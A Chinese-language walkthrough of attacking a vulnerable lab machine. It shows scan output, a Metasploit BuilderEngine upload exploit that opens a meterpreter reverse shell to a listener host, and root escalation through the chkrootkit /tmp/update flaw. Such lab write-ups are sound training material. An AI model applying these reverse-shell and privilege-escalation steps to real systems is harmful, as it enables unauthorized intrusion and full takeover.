# 靶场搭建

下载靶机,直接导入,开启 NAT 模式就 OK

IP: 192.168.1.131

# 信息初收集

端口开放:

22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
993/tcp   open  imaps
995/tcp   open  pop3s
8080/tcp  open  http-proxy
46322/tcp open  unknown

目录收集

[02:38:38] 301 -  314B  - /blocks  ->  http://192.168.1.131/blocks/         
[02:38:41] 200 -  392B  - /codeception.yml                                  
[02:38:50] 301 -  313B  - /files  ->  http://192.168.1.131/files/           
[02:38:50] 200 -  522B  - /files/                                           
[02:38:59] 200 -  706B  - /license.txt                                      
[02:39:05] 301 -  315B  - /modules  ->  http://192.168.1.131/modules/       
[02:39:05] 200 -  538B  - /modules/                                         
[02:39:18] 200 -   36B  - /robots.txt                                       
[02:39:19] 403 -  293B  - /server-status                                    
[02:39:19] 403 -  294B  - /server-status/
[02:39:26] 301 -  314B  - /system  ->  http://192.168.1.131/system/         
[02:39:26] 200 -  120B  - /system/                                          
[02:39:27] 301 -  314B  - /themes  ->  http://192.168.1.131/themes/         
[02:39:27] 200 -  503B  - /themes/

+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 65, size: 53fb059bb5bc8, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /system/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /license.txt: License file found may identify site software.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.

服务详细识别:

PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
46322/tcp open  status      1 (RPC #100024)

通过 themes 的信息收集,找到他的主题是 Default 2015 Theme for BuilderEngine V3.

在 metasploit 中搜索这个主题发现有漏洞的,我们直接利用

# 渗透过程

# builderengine 拿 shell

利用 metasploit 中的模块拿到 shell

msf6 exploit(multi/http/builderengine_upload_exec) > show options 

Module options (exploit/multi/http/builderengine_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.131    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                         cs/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to BuilderEngine
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   BuilderEngine 3.5.0



View the full module info with the info, or info -d command.

# 提权

查看运行的程序,看到 chkrootkit 程序,通过使用 metasploit 中相关模块,进行提权

msf6 exploit(unix/local/chkrootkit) > show options 

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION     1                     yes       The session to run this module on


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

run 起来之后等待执行反弹 shell 即可。

# 小结

chkrootkit 漏洞利用原理在这里: https://www.exploit-db.com/exploits/33899

定时执行 /tmp/update ,把命令写入这里,按照 chkrootkit 的用户权限执行。直接拿到 root 权限的。